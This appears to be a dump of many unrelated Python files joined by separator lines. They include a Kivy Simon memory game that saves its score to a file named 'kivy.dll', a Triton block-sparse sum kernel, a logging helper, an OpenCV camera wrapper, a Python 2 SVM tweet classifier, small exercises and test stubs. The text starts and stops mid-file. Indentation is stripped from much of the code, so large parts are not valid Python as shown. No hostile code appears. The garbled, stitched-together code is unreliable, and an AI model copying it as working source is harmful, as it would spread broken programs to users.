"""List available plug-ins"""
_import_plugins()
    return list(PLUGINS.keys())
def _import_plugins():
"""Import all resources to register plug-ins"""
for name in resources.contents(__name__):
if name.endswith(".py"):
import_module(f"{__name__}.{name[:-3]}")
|
python
|
# import os
# os.environ["KIVY_WINDOW"] = "sdl2"
# uncomment the above lines to run on raspberrypi like it runs on windows.
import kivy
kivy.require('1.9.1')
from kivy.app import App
from kivy.uix.boxlayout import BoxLayout
from kivy.clock import Clock
from time import sleep, time
from random import randint
from functools import partial
import threading
class SimonBoxLayout(BoxLayout):
""" Game logic goes inside this class."""
# when game is launched, start blinking new game button
def __init__(self):
super().__init__()
self.set_game_variables(init=True)
self.custom_animate_button(self.restart_button, "blink_loop")
# binded to newgame button
def start(self, *args):
''' start a new game thread '''
threading.Thread(target=self.setup, args=args).start()
# setup a new game
def setup(self, r, b, g, y):
        ''' Receives the colored button objects.
        Sets up all the game variables and starts the game loop.'''
# blink once animation for start game button after clicked
self.custom_animate_button(self.restart_button, "down")
# handle player clicking "new game" before game is over
if not self.players_turn:
return
elif self.game_on:
self.aborted = True
else:
self.aborted = False
# init/reset variables for new game
self.set_game_variables(r, b, g, y)
# game starting animation
self.game_starting()
# setup game screen
self.update_current()
# start game loop
self.game_on = True
self.newgame()
# init/reset all game variables
def set_game_variables(self, *args, init=False):
''' information about the game is stored in these variables '''
# used to continue looping game
self.game_on = False
# kivy button objects for the colored squares
self.objcs = [i for i in args]
        # starting length of the sequence
self.starting_size = 1
        # random new sequence that the player will try to replicate
self.rand_list = [randint(0, 3) for i in range(self.starting_size - 1)]
# player current attempt to replicate sequence
self.player_moves = []
        # longest sequence successfully replicated in the current game
self.current_streak = 0
        # all-time longest replicated sequence (the saved record)
self.longest_streak = self.load_record()
# in seconds, how long before next blinking square
self.speed = 1
# used to lock player input while showing sequence
self.players_turn = init
# if this game broke previous record
self.new_record_flag = False
# kill_thread_flag is used to kill python loops after game closes
self.kill_thread_flag = threading.Event()
# game loop
def newgame(self):
while self.game_on:
# check if program was closed
if self.kill_thread_flag.is_set():
# if yes kill loop
return
self.output_pattern()
self.intake_pattern()
self.update_current()
self.announce_gameover()
# schedule the sequence
def output_pattern(self):
# lock player input while sequence being shown
self.change_turn(turn="computer")
# add new value to sequence
self.rand_list.append(randint(0, 3))
# time buffer between events in order to not move too fast for humans:
buff = self.update_self_speed()
sleep(5 * buff)
# list of functions to blink (dim/turnon) each button in sequence
dim_list = []
turnon_list = []
for i in self.rand_list:
obj = self.objcs[i]
partial_func1 = partial(self.showpattern_dim, obj)
partial_func2 = partial(self.showpattern_high, obj)
dim_list.append(partial_func1)
turnon_list.append(partial_func2)
# scheduling the time of execution of each function,
# in order to create the sequence flow.
# the buffer is used to create the blink effect
for i in range(len(dim_list)):
# schedule turning button off
Clock.schedule_once(dim_list[i], i * (self.speed) + buff)
# schedule turning button back on
Clock.schedule_once(turnon_list[i], (i + 1) * (self.speed))
# allow player's input after entire sequence was shown
unlock_player = partial(self.change_turn, **{"turn": "player"})
Clock.schedule_once(unlock_player, (i + 1) * (self.speed))
# get player's input
def intake_pattern(self, *args):
# reset the players input from previous round
self.player_moves = []
# wait for players turn
while not self.players_turn:
# check if program was closed
if self.kill_thread_flag.is_set() or not self.game_on:
# if yes kill loop
return
# sleep and wait to check again
sleep(0.3)
# Player button clicks will append values to self.player_moves.
# This loop will check and make sure every click matches sequence.
        # Will exit when the number of player inputs equals the length of the sequence.
while True:
# check if program was closed or new game was pressed
if self.kill_thread_flag.is_set() or not self.game_on:
# if yes kill loop
return
# check if lists are equal
counter = 0
for x, y in zip(self.player_moves, self.rand_list):
if x != y:
# if different, declare game over
self.game_on = False
self.aborted = False
return
counter += 1
# return when player has reproduced the entire sequence
if counter == len(self.rand_list):
return
# wait a little before continuing loop
sleep(0.1)
# update screen after every turn
def update_current(self):
# define current streak
if not self.game_on:
self.current_streak = (len(self.rand_list) - 1 if
len(self.rand_list) > 0 else 0)
else:
self.current_streak = len(self.rand_list)
# if your streak is bigger than your record, update record
if self.current_streak > self.longest_streak:
self.new_record_flag = True
self.longest_streak = self.current_streak
# update the screen with your total streak and record
streak = 'Current streak: ' + str(self.current_streak)
record = 'All time best: ' + str(self.longest_streak)
self.streak.text = streak
self.record.text = record
# if game is over, announce it
def announce_gameover(self):
# if game was aborted skip announcing
if self.aborted:
return
# if there was a new record, update file, and congratulate
if self.new_record_flag:
with open("kivy.dll", mode="w") as f:
f.write(str(hex(self.current_streak)))
announce = "GAMEOVER\nCongratz!\nYour new record is "
announce += str(self.current_streak) + " repetitions."
else:
announce = "GAMEOVER\nYour record remains "
announce += str(self.longest_streak) + " repetitions."
self.turn.color = [1, 0, 0, 1]
self.turn.text = (announce)
    # dim button (receives *args because scheduling passes an extra "dt" arg)
def showpattern_dim(self, obj, *args):
obj.background_color[-1] = 0.2
# brighten button
def showpattern_high(self, obj, *args):
obj.background_color[-1] = 1
# update if it's player turn to play or not
def change_turn(self, *args, turn, **kwargs):
# make output message yellow
self.turn.color = [1, 1, 0, 1]
if turn == "player":
self.players_turn = True
self.turn.text = "YOUR TURN!"
elif turn == "computer":
self.players_turn = False
self.turn.text = ("REPEAT THIS SEQUENCE")
else:
raise ValueError("change turn error")
# load record from storage file
def load_record(self):
try:
with open("kivy.dll") as f:
data = f.readline()
return int(data, 16)
except FileNotFoundError:
with open("kivy.dll", mode="w") as f:
f.write("0")
return 0
# bound to colored buttons
def click_append(self, color_number):
# if its player turn, append to list else don't.
if self.players_turn and self.game_on:
self.player_moves.append(color_number)
elif not self.players_turn:
self.turn.color = [0 / 255, 95 / 255, 249 / 255, 1]
self.turn.text = "Not your turn yet!"
else:
pass
# increment speed with every move
def update_self_speed(self):
        ''' Update the game speed so rounds get faster as the sequence grows.
        Returns the time buffer to use between blinks and other scheduled events.
        '''
self.speed = round(self.speed - self.speed / 10, 2)
self.speed = 0.4 if self.speed < 0.4 else self.speed
return round(self.speed / 10, 2)
# animate button so the user knows it was clicked
def custom_animate_button(self, button, high_or_low):
# turn button red when pressed
if high_or_low == "down":
button.color = [0 / 255, 95 / 255, 249 / 255, 1]
# turn yellow when released
elif high_or_low == "up":
def unpress(*args):
button.color = [1, 1, 0, 1]
Clock.schedule_once(unpress, 1)
# blinking effect when waiting for player to click
elif high_or_low == "blink_loop":
def blink(*args):
if self.game_on:
button.color = [1, 1, 0, 1]
elif button.color == [1, 1, 0, 1]:
button.color = [1, 0, 0, 1]
elif button.color == [1, 0, 0, 1]:
button.color = [1, 1, 0, 1]
for i in range(3600):
Clock.schedule_once(blink, i * 0.5)
else:
raise ValueError("Button state not recognized")
# game starting animation
def game_starting(self):
msg = "Starting game "
self.turn.color = [0 / 255, 95 / 255, 249 / 255, 1]
for i in range(5):
self.turn.text = msg
msg += ". "
sleep(0.2)
# The .kv file must be named after this class with the "App" suffix removed, all lowercase: simongame.kv
class SimonGameApp(App):
def on_stop(self):
self.root.kill_thread_flag.set()
def build(self):
return SimonBoxLayout()
myapp = SimonGameApp()
myapp.run()
|
python
|
import torch
import unseal.transformers_util as tutil
from unseal.hooks import HookedModel
def test_load_model():
model, tokenizer, config = tutil.load_from_pretrained('gpt2')
assert model is not None
assert tokenizer is not None
assert config is not None
def test_load_model_with_dir():
model, tokenizer, config = tutil.load_from_pretrained('gpt-neo-125M', model_dir='EleutherAI')
assert model is not None
assert tokenizer is not None
assert config is not None
def test_load_model_eleuther_without_dir():
model, tokenizer, config = tutil.load_from_pretrained('gpt-neo-125M')
assert model is not None
assert tokenizer is not None
assert config is not None
def test_load_model_with_low_mem():
model, tokenizer, config = tutil.load_from_pretrained('gpt2', low_cpu_mem_usage=True)
assert model is not None
assert tokenizer is not None
assert config is not None
def test_get_num_layers_gpt2():
model, *_ = tutil.load_from_pretrained('gpt2')
model = HookedModel(model)
assert tutil.get_num_layers(model, 'transformer->h') == 12
def test_get_num_layers_transformer():
model = torch.nn.Transformer(d_model=10, nhead=2, num_encoder_layers=0, num_decoder_layers=10)
model = HookedModel(model)
    assert tutil.get_num_layers(model, 'decoder->layers') == 10
|
python
|
import cv2
from image_manipulation import binarize_image, grayscale_image
class Camera(object):
"""
Class to take pictures.
:param width_size: camera's image width
:type width_size: int
:param height_size: camera's image height
:type height_size: int
:param input_cam_device: param to control camera's input
:type input_cam_device: int
:param height_param: param to set height on camera
:type height_param: int
:param width_param: param to set width on camera
:type width_param: int
:param mode: param to control type of image
:type mode: str
:param debug: param to enter debug mode
:type debug: bool
:param resize: param to control the image resizing
:type resize: float
"""
def __init__(self,
width_size=160,
height_size=90,
input_cam_device=0,
height_param=4,
width_param=3,
mode="pure",
debug=False,
resize=1.0):
self.cam = cv2.VideoCapture(input_cam_device)
self.cam.set(width_param, width_size)
self.cam.set(height_param, height_size)
assert mode == "pure" or mode == "green" or mode == "bin" or mode == "gray" # noqa
self.mode = mode
self.resize = resize
self.debug = debug
def save_image(self, path, img):
"""
Save image in path "path".
:param path: path to save image
:type path: str
:param img: image
:type img: np.ndarray
"""
cv2.imwrite(path, img)
def take_picture(self):
"""
Take picture according to the mode param.
:rtype: np.ndarray
"""
if self.mode == "pure":
return self.take_picture_rgb()
elif self.mode == "green":
return self.take_picture_green()
elif self.mode == "bin":
return self.take_picture_bin()
elif self.mode == "gray":
return self.take_picture_gray()
def take_picture_rgb(self):
"""
Take picture with no transformation.
:return: resized image
:rtype: np.ndarray, np.ndarray
"""
_, img = self.cam.read()
res = cv2.resize(img, (0, 0), fx=self.resize, fy=self.resize)
if self.debug:
return res, img
return res
def take_picture_gray(self):
"""
Take grayscale picture.
:return: gray and resized image
:rtype: np.ndarray, np.ndarray
"""
_, orig = self.cam.read()
img = cv2.resize(orig, (0, 0), fx=self.resize, fy=self.resize)
img = grayscale_image(img)
if self.debug:
return img, orig
return img
def take_picture_bin(self):
"""
Take binarized picture.
:return: binary and resized image
:rtype: np.ndarray, np.ndarray
"""
_, orig = self.cam.read()
img = cv2.resize(orig, (0, 0), fx=self.resize, fy=self.resize)
img = binarize_image(img)
if self.debug:
return img, orig
return img
def take_picture_green(self):
"""
Take picture with only the green channel.
:return: green and resized image
:rtype: np.ndarray, np.ndarray
"""
        _, orig = self.cam.read()
        img = cv2.resize(orig, (0, 0), fx=self.resize, fy=self.resize)
        green = img[:, :, 1]  # keep only the green channel (index 1 in BGR)
        if self.debug:
            return green, orig
        return green
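# Hypothetical usage sketch (assumes a webcam is attached as device 0 and that the
# image_manipulation helpers imported above are available):
if __name__ == "__main__":
    cam = Camera(mode="gray", resize=0.5, debug=False)
    frame = cam.take_picture()
    cam.save_image("frame.png", frame)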
|
python
|
#Passing a List
def greet(names):
for name in names:
msg=f"Hello, {name.title()}"
print(msg)
username=['alice','beerus','cyrus']
greet(username)
|
python
|
# coding:utf-8
# log utils
"""
切记: 不要重复创造日志对象,否则会重复打印
"""
# import os
from logging import (
handlers,
getLogger,)
from logging import Formatter as LoggingFormatter
from logging import StreamHandler as LoggingStreamHandler
from logging import FileHandler as LoggingFileHandler
from logging import ERROR as LOGGING_ERROR
from logging import DEBUG as LOGGING_DEBUG
__all__ = [
'set_logger'
]
CONSOLE_FORMATTER = '%(asctime)s [%(levelname)-6s] ➞ %(message)s'
FILE_FORMATTER = '%(asctime)s [%(levelname)-6s] at %(filename)s in %(funcName)s.%(lineno)d ↴\n %(message)s\n'
def set_logger(log_file_name,
console_log_level=LOGGING_DEBUG,
file_log_level=LOGGING_ERROR,
console_formatter=CONSOLE_FORMATTER,
file_formatter=FILE_FORMATTER,
logger_name='my_logger'):
    # Create a logger (consider wrapping this setup in your own helper).
    # Tip: when several related files all use Python's logging, avoid the default root
    # logger: every named logger propagates to root, which causes duplicate output.
    # Always give your logger an explicit name!
logger = getLogger(logger_name)
logger.setLevel(LOGGING_DEBUG)
    # Create a handler that writes to the log file
    # fh = LoggingFileHandler(os.path.join(os.getcwd(), './my_log.txt'))
    # encoding='utf-8' below lets non-ASCII (e.g. Chinese) messages be written correctly
file_handler = handlers.RotatingFileHandler(
filename=log_file_name,
maxBytes=1024 * 1024,
backupCount=5,
encoding='utf-8',)
file_handler.setLevel(file_log_level)
    # Create another handler that writes to the console
console_handler = LoggingStreamHandler()
console_handler.setLevel(console_log_level)
    # Define the output format for each handler
_console_formatter = LoggingFormatter(console_formatter)
_file_formatter = LoggingFormatter(file_formatter)
console_handler.setFormatter(_console_formatter)
file_handler.setFormatter(_file_formatter)
    # Attach the handlers to the logger
logger.addHandler(console_handler)
logger.addHandler(file_handler)
    # Log a test message
# logger.info('hello world, i\'m log helper in python, may i help you')
return logger
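# Usage sketch: DEBUG and above goes to the console, ERROR and above is written to a
# rotating log file (the file name below is chosen only for illustration).
if __name__ == '__main__':
    log = set_logger('my_log.txt')
    log.debug('shown on the console only')
    log.error('shown on the console and appended to my_log.txt')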
|
python
|
# Adapted from https://github.com/openai/triton/blob/master/python/triton/ops/blocksparse/softmax.py
import triton.language as tl
import triton
import torch
from src.models.attention.blocksparse_utils import sparsify_broadcast_tensor
def next_power_of_2(n):
n -= 1
n |= n >> 1
n |= n >> 2
n |= n >> 4
n |= n >> 8
n |= n >> 16
n += 1
return n
def num_warps(n):
if n < 512:
return 4
if n < 2048:
return 8
return 16
@triton.heuristics({'num_warps': lambda *args, **meta: num_warps(args[3] * meta['BLOCK'])})
@triton.heuristics({'TN': lambda *args, **meta: next_power_of_2(args[3] * meta['BLOCK'])})
@triton.jit
def _forward(
X, OUT, LUT, sizemax, stride_zx, stride_zout, stride_hout, **meta
):
TN = meta['TN']
BLOCK = meta['BLOCK']
pidhm = tl.program_id(0)
pidz = tl.program_id(1)
# create index ranges
rxm = pidhm % BLOCK
rbm = pidhm // BLOCK
rxn = tl.arange(0, TN) % BLOCK
rbn = tl.arange(0, TN) // BLOCK
# extract information from LUT
header = LUT + rbm * 2
size = tl.load(header + 0)
offset = tl.load(header + 1)
check = rbn < size
rbmn = tl.where(check, rbn, size - 1)
# block id and column id
blockid = tl.load(LUT + offset + rbmn * 4 + 0)
rowid = tl.load(LUT + offset + rbmn * 4 + 2)
headid = tl.load(LUT + offset + rbmn * 4 + 3)
# pointers to X
px = X + pidz * stride_zx + blockid * BLOCK * BLOCK + rxm * BLOCK + rxn
x = tl.load(px, mask=check, other=0)
x = x.to(tl.float32)
# computation
out = tl.sum(x, axis=0)
# pointers to OUT
pout = OUT + pidz * stride_zout + headid * stride_hout + rowid * BLOCK + rxm
tl.store(pout, out)
@triton.heuristics({'num_warps': lambda *args, **meta: num_warps(args[3] * meta['BLOCK'])})
@triton.heuristics({'TN': lambda *args, **meta: next_power_of_2(args[3]) * meta['BLOCK']})
@triton.jit
def _backward(DX, DOUT, LUT, sizemax, stride_zdx, stride_zdout, stride_hdout, **meta):
pidhm = tl.program_id(0)
pidz = tl.program_id(1)
TN = meta['TN']
BLOCK = meta['BLOCK']
# create index ranges
rxm = pidhm % BLOCK
rbm = pidhm // BLOCK
rxn = tl.arange(0, TN) % BLOCK
rbn = tl.arange(0, TN) // BLOCK
# extract information from look-up table
header = LUT + rbm * 2
size = tl.load(header + 0)
offset = tl.load(header + 1)
# bounds checking on lut
check = rbn < size
rbmn = tl.where(check, rbn, size - 1)
# initialize pointers to block-sparse input
blockid = tl.load(LUT + offset + rbmn * 4)
rowid = tl.load(LUT + offset + rbmn * 4 + 2)
headid = tl.load(LUT + offset + rbmn * 4 + 3)
pdx = DX + pidz * stride_zdx + blockid * BLOCK * BLOCK + rxm * BLOCK + rxn
pdout = DOUT + pidz * stride_zdout + headid * stride_hdout + rowid * BLOCK + rxm
# Load
# [2021-09-14] TD: Triton's broadcasting is very buggy, I have to read from dx (which is all
# zeros) just so that I can broadcast dout (a scalar).
dx_zeros = tl.load(pdx, mask=check, other=0)
dout = tl.load(pdout)
# Computation
dx = dout - dx_zeros
tl.store(pdx, dx, mask=check)
class _sum(torch.autograd.Function):
@staticmethod
def make_lut(layout, block, device):
_empty = torch.tensor([], dtype=torch.int64, device=layout.device)
sizes = _empty.clone()
# sizes along rows
for h in range(layout.shape[0]):
sizes = torch.cat((sizes, layout[h, :, :].sum(-1)))
# offsets in block format
offsets = torch.zeros_like(sizes)
offsets[1:] = torch.cumsum(sizes[:-1], dim=0)
# block indices
idx = torch.arange(layout.sum())
head = layout.nonzero(as_tuple=False)[:, 0]
rows = layout.nonzero(as_tuple=False)[:, 1]
columns = layout.nonzero(as_tuple=False)[:, 2]
core = torch.stack((idx, columns, rows, head), dim=1).view(-1)
# construct look-up table
offsets = offsets * 4 + 2 * sizes.numel()
header = torch.stack((sizes, offsets), dim=1).view(-1)
lut = torch.cat((header, core)).type(torch.int32).to(device)
n_head = layout.shape[0]
n_row = layout.shape[1] * block
return lut, int(sizes.max()), n_head, n_row
@staticmethod
def forward(ctx, x, spdims, block, lut, maxlut, n_head, n_row, layout, bench, time):
out = torch.zeros((x.shape[0], n_head, n_row), dtype=x.dtype, device=x.device)
# run kernel
M = x.shape[0]
meta = {'BLOCK': block}
grid = lambda opt: [spdims[0] * spdims[1] * block, M]
_forward[grid](x, out, lut, maxlut, x.stride(0), out.stride(0), out.stride(1),
force_nc_cache=True, **meta)
# save to context
ctx.save_for_backward(x, lut, layout)
ctx.spdims = spdims
ctx.block = block
ctx.maxlut = maxlut
return out
@staticmethod
def backward(ctx, dout):
# retrieve from context
x, lut, layout = ctx.saved_tensors
block = x.shape[-1]
dx = sparsify_broadcast_tensor(dout, layout, block).expand(-1, -1, -1, block)
# dx = torch.zeros_like(x)
# run kernel
# M = x.shape[0]
# grid = lambda opt: [ctx.spdims[0] * ctx.spdims[1] * ctx.block, M]
# _backward[grid](dx, dout, lut, ctx.maxlut, dx.stride(0), dout.stride(0), dout.stride(1),
# force_nc_cache=True, BLOCK=ctx.block)
return dx, None, None, None, None, None, None, None, None, None
class blocksparse_sum:
apply_sum = _sum.apply
def make_lut(self, device):
key = (device, )
if key not in self.lut_cache:
self.lut_cache[key] = _sum.make_lut(self.layout, self.block, device)
return self.lut_cache[key]
def __init__(self, layout, block, bench=False):
self.spdims = layout.shape
self.layout = layout
self.block = block
self.bench = bench
self.lut_cache = dict()
def __call__(self, x):
time_y = [None]
lut, maxlut, n_head, n_row = self.make_lut(x.device)
x = blocksparse_sum.apply_sum(
x, self.spdims, self.block, lut, maxlut, n_head, n_row, self.layout, self.bench, time_y
)
return x
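# Hypothetical usage sketch (requires a CUDA device and the older triton API this kernel
# targets; `layout` is a (n_head, n_blk_row, n_blk_col) 0/1 tensor and `x` holds the
# nonzero blocks, ordered as layout.nonzero(), with shape (batch, nnz, block, block)):
if __name__ == '__main__':
    block = 16
    layout = torch.ones(2, 4, 4, dtype=torch.int64)       # dense layout: every block kept
    x = torch.randn(3, int(layout.sum()), block, block, device='cuda')
    row_sum = blocksparse_sum(layout, block)(x)
    print(row_sum.shape)                                   # (3, n_head, n_blk_row * block)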
|
python
|
import time
import rich
from hurry.filesize import size
from tabulate import tabulate
class Format:
def __init__(self):
pass
@staticmethod
def cli(**kwargs):
"""
Handle in coming CLI Output Style
"""
if "standard" in kwargs["style"]:
return Format._default(**kwargs)
return "Error"
@classmethod
def _default(cls, **kwargs):
table = []
columns = []
rows = []
if kwargs["source"] == "dict":
columns, rows = cls.__dict(kwargs["data"])
table.append(rows)
elif kwargs["source"] == "list":
for d in kwargs["data"]["response"]:
columns, rows = cls.__list(d)
table.append(rows)
elif kwargs["source"] == "history":
for d in kwargs["data"]["response"]:
__columns, __rows = cls.__history(d)
""" Don't override existing table """
if len(__columns) != 0:
columns = __columns
if len(__rows) != 0:
rows = __rows
table.append(rows)
elif kwargs["source"] == "progress":
for d in kwargs["data"]["response"]:
columns, rows = cls.__progress(d)
table.append(rows)
if len(rows) != 0:
console = rich.get_console()
console.print(
tabulate(
table,
columns,
tablefmt="plain",
stralign="left",
disable_numparse=True,
),
soft_wrap=True,
)
return True
return False
@classmethod
def __dict(cls, data):
columns = []
rows = []
for k, v in data.items():
if k.lower() != "token":
columns.append(k.upper())
rows.append(v)
return columns, rows
@classmethod
def __list(cls, d):
excluded_columns = [
"versions",
"backup_services",
"compatible_error",
]
columns = []
rows = []
for k, v in d.items():
if k not in excluded_columns:
columns.append(k.upper())
if "time" in k:
v = str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(v)))
if "size" in k:
v = str(size(v))
if "percentage" in k:
v = "{}%".format(int(v))
if "_version" in k:
v = str(v)
rows.append(v)
return columns, rows
@classmethod
def __history(cls, d):
included_columns = [
"backup_id",
"start_timestamp",
"status",
"operation",
"id",
"progress_in_percentage",
"description",
"backup_size",
]
columns = []
rows = []
if "PENDING" not in d["status"]:
for k, v in d.items():
if k in included_columns:
columns.append(k.upper())
if "time" in k:
v = str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(v)))
if "size" in k:
v = str(size(v))
if "percentage" in k:
v = "{}%".format(int(v))
rows.append(v)
return columns, rows
@classmethod
def __progress(cls, d):
included_columns = [
"backup_id",
"start_timestamp",
"status",
"operation",
"id",
"progress_in_percentage",
"description",
"backup_size",
]
columns = []
rows = []
for k, v in d.items():
if k in included_columns:
columns.append(k.upper())
if "time" in k:
v = str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(v)))
if "size" in k:
v = str(size(v))
if "percentage" in k:
v = "{}%".format(int(v))
rows.append(v)
return columns, rows
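# Hypothetical usage sketch: render a single record as a plain-text table on the console
# (field names below are illustrative; the "token" field is always filtered out).
if __name__ == "__main__":
    Format.cli(
        style="standard",
        source="dict",
        data={"id": "backup-1", "status": "COMPLETED", "token": "secret"},
    )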
|
python
|
#!/usr/bin/env python2.7
import os
import sys
sys.path.insert(0, os.path.realpath(os.path.join(__file__, '../../../lib')))
import exatest
from exatest.utils import chdir
from exatest import (
useData,
)
class TestParameterized(exatest.TestCase):
@useData((x,) for x in range(10))
def test_parameterized(self, x):
self.assertRowsEqual([(None,)], self.query('select * from dual'))
@useData((x,) for x in range(1000))
def test_large_parameterized(self, x):
self.assertRowsEqual([(None,)], self.query('select * from dual'))
class TestSetUp(exatest.TestCase):
def setUp(self):
self.query('DROP SCHEMA t1 CASCADE', ignore_errors=True)
self.query('CREATE SCHEMA t1')
def test_1(self):
self.query('select * from dual')
def test_2(self):
self.query('select * from dual')
class ODBCTest(exatest.TestCase):
def test_find_odbcini_after_chdir(self):
self.assertTrue(os.path.exists('odbc.ini'))
with chdir('/'):
self.assertFalse(os.path.exists('odbc.ini'))
self.query('select * from dual')
if __name__ == '__main__':
# remove undefined option used in wrapper script
for i in range(len(sys.argv)):
if sys.argv[i].startswith('--jdbc-path='):
# --foo=bar
sys.argv.pop(i)
break
if sys.argv[i].startswith('--jdbc-path'):
# --foo bar
sys.argv.pop(i)
sys.argv.pop(i)
break
exatest.main()
# vim: ts=4:sts=4:sw=4:et:fdm=indent
|
python
|
import sys, getopt
import run
def main(argv):
path_database = ''
path_cnn_trained = ''
path_folder_retrieval = ''
feature_extraction_method = ''
distance = ''
searching_method = ''
number_of_images = 0
list_of_parameters = []
try:
opts, args = getopt.getopt(argv,"hd:c:r:f:s:p:n:m:")
except getopt.GetoptError:
        print ('cbir_cl.py -d <path_database> -c <path_cnn_trained> -r <path_folder_retrieval> -f <feature_extraction_method> -s <distance-similarity metric> -p <searching_method> -n <number_of_images> -m <list_of_parameters>')
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
            print ('cbir_cl.py -d <path_database> -c <path_cnn_trained> -r <path_folder_retrieval> -f <feature_extraction_method> -s <distance-similarity metric> -p <searching_method> -n <number_of_images> -m <list_of_parameters>')
sys.exit()
elif opt == '-d':
path_database = arg
elif opt == '-c':
path_cnn_trained = arg
elif opt == '-r':
path_folder_retrieval = arg
elif opt == '-f':
feature_extraction_method = arg
elif opt == '-s':
distance = arg
elif opt == '-p':
searching_method = arg
elif opt == '-n':
number_of_images = int(float(arg))
elif opt == '-m':
parameters = arg.split(',')
for i in parameters:
list_of_parameters.append(i)
run.run_command_line(path_database,path_folder_retrieval,path_cnn_trained,feature_extraction_method,distance,number_of_images,list_of_parameters)
if __name__ == "__main__":
main(sys.argv[1:])
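# Example invocation (all paths and parameter values below are illustrative):
#   python cbir_cl.py -d /data/db -c /data/cnn_model -r /data/queries \
#       -f cnn -s ed -p brute -n 10 -m 0.5,relu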
|
python
|
import sys
import torch
sys.path.insert(0, "../")
from linformer_pytorch import Linformer, Visualizer
model = Linformer(
input_size=512,
channels=16,
dim_k=128,
dim_ff=32,
nhead=4,
depth=3,
activation="relu",
checkpoint_level="C0",
parameter_sharing="layerwise",
k_reduce_by_layer=1,
)
x = torch.randn(1, 512, 16)
y = model(x, visualize=True)
vis = Visualizer(model)
vis.plot_all_heads(title="All P_bar matrices",
show=True,
save_file=None,
figsize=(8,6),
n_limit=256)
print(y) # (1, 512, 16)
|
python
|
from typing import List
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
l, r = 0, len(nums) - 1
while l<=r:
m = (l+r)//2
if nums[m]==target:
return m
elif nums[m]>target:
r=m-1
else:
l=m+1
return l
arr= [1,3,5,6]
target = 0
ans = Solution().searchInsert(arr, target)
print(ans)
|
python
|
import heapq
import math
import numpy as np
import nltk.probability
from nltk.classify import SklearnClassifier
from sklearn.svm import SVC
import re
import sys
sys.path.insert(0, '..')
from definitions import *
sys.path.insert(0, '../Wrapper/')
from helper import *
def get_svm_classifier(parameters):
print "Loading training data..."
# A dictionary whose keys are strings (words) and values are tweetclass objects
terms = {}
# Load training data
go_training_data = open(GO_TRAINING_DATA)
go_tweets = []
# Load stop words
sw = open(STOP_WORDS_DATA)
stop_words = {}
for line in sw:
stop_words[line.strip()] = True
# DEBUG
debug_counter = 0
positive_counter = 0
negative_counter = 0
# A debug limit for the number of positive and negative tweets
upto = parameters.upto
for line in go_training_data:
# Parse the line for the classification and the tweet
parts = line.split(",")
score = float(parts[0].replace('"', ""))
if score == 0:
if negative_counter >= upto:
continue
negative_counter = negative_counter + 1
else:
if positive_counter >= upto:
continue
positive_counter = positive_counter + 1
bag = get_words(parts[5], stop_words)
go_tweets.append((score, bag))
# Add all the words in the tweet to the list of all terms
for word in bag:
if word not in terms:
nt = tweetclass(word)
if score == 0:
nt.negative = 1
nt.positive = 0
else:
nt.positive = 1
nt.negative = 0
terms[word] = nt
else:
if score == 0:
terms[word].negative = terms[word].negative + 1
else:
terms[word].positive = terms[word].positive + 1
# Debug
debug_counter = debug_counter + 1
if debug_counter % 1000 == 0:
print "processed %d tweets" % debug_counter
negative_classifications = 0
for (score, bag) in go_tweets:
if score == 0:
negative_classifications = negative_classifications + 1
positive_classifications = len(go_tweets) - negative_classifications
print "Training data loaded!"
# Get the top number of terms
print "Getting top terms from mutual information"
scores = []
top_terms = []
term_limit = parameters.term_limit
heap_terms_processed = 0
for term in terms:
score = get_score(term, positive_classifications, negative_classifications, terms)
# Debug
#print "score: %f\tterm: %s" % (score, term)
if heap_terms_processed % 1000 == 0:
print "heap terms processed: %d" % heap_terms_processed
heapq.heappush(scores, (score, term))
if len(scores) > term_limit:
heapq.heappop(scores)
assert len(scores) <= term_limit
heap_terms_processed = heap_terms_processed + 1
for item in scores:
top_terms.append(item[1])
tt = top_terms
top_terms = {}
for t in tt:
top_terms[t] = True
print "Top terms found"
# Debug
print "Total number of terms: %d" % len(terms)
#assert False
#TODO
# Train
num_features = len(top_terms)
num_samples = len(go_tweets)
#X = np.zeros((num_samples, num_features))
train = []
#y = []
for (score, bag) in go_tweets:
fv = {}
# feature vector for this tweet
for word in bag:
if word in top_terms:
fv[word] = 1
train.append( (fv, score) )
print "Fitting data..."
classifier = SklearnClassifier(SVC(kernel=parameters.kernel, probability=True)).train(train)
return classifier, top_terms, stop_words
|
python
|
# TASK 1. Write a function that takes a list of strings and capitalizes the first
# letter of every string in the list.
def katta_harf(ismlar):
    for i in range(len(ismlar)):
        ismlar[i] = ismlar[i].title()
ismlar = ['ali', 'vali', 'hasan', 'husan']
katta_harf(ismlar)
print(ismlar)
# TASK 2. Modify the function above so that it leaves the original list unchanged and returns a new list instead.
def katta_harf(ismlar):
names = []
while ismlar:
ism = ismlar.pop()
names.append(ism.title())
return names
ismlar = ['ali', 'vali', 'hasan', 'husan']
yangi_ismlar = katta_harf(ismlar[:])
print(ismlar)
print(yangi_ismlar)
|
python
|
import NNRequestHandler.Base
import NNRequestHandler.User
NN_REQUEST_CMD_USER_LOGIN = 1
class DispatchCenter(object):
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super(DispatchCenter, cls).__new__(
cls, *args, **kwargs)
return cls._instance
def __init__(self):
self.cache = {}
map = self.commandMap()
for item in map:
for command in item:
self.installHandler(command, item[command])
def commandMap(self):
return [
{NN_REQUEST_CMD_USER_LOGIN : NNRequestHandler.User.LoginHandler}
]
def installHandler(self, command, HandlerClass):
        if command <= 0:
            raise ValueError("Command number must be greater than 0")
        if not issubclass(HandlerClass, NNRequestHandler.Base.RequestHandler):
            raise TypeError("Request handler class must be a subclass of RequestHandler")
self.cache[command] = HandlerClass
def dispatch(self, uin, command, body):
        if command not in self.cache:
            raise ValueError("Unknown command %d" % command)
handlerClass = self.cache[command]
handler = handlerClass(uin, body)
handler.checkParams()
handler.proccess()
handler.dump()
return (handler.retCode, handler.rspBody)
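# Hypothetical usage sketch (assumes NNRequestHandler.User.LoginHandler implements
# checkParams/proccess/dump and exposes retCode/rspBody, as dispatch() above expects):
if __name__ == '__main__':
    center = DispatchCenter()
    ret_code, rsp_body = center.dispatch(uin=10001, command=NN_REQUEST_CMD_USER_LOGIN, body='{}')
    print("retCode=%s rspBody=%s" % (ret_code, rsp_body))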
|
python
|
import unittest
from streamlink.plugins.canlitv import Canlitv, _m3u8_re
class TestPluginCanlitv(unittest.TestCase):
def test_m3u8_re(self):
